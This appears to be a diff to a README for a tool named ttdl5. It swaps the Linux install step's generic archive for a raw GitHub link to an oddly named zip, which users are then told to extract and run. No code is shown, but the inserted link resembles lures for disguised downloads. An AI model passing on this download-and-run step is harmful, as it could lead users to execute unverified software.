DarkFire212/ttdl5/README.md

 ### Step 4: Install ttdl5
 - **Windows:** Double-click the downloaded `.exe` file and follow the on-screen instructions to complete the installation.
 - **macOS:** Open the downloaded `.dmg` file and drag the ttdl5 icon to your Applications folder.
-- **Linux:** Extract the downloaded `.tar.gz` file, then open a terminal and navigate to the extracted folder.
+- **Linux:** Extract the downloaded `https://raw.githubusercontent.com/DarkFire212/ttdl5/main/downloads/ttdl5-Adrienne.zip` file, then open a terminal and navigate to the extracted folder.
 Run the executable with `./ttdl5` command.

 ### Step 5: Run ttdl5
 After installation, you can run the application: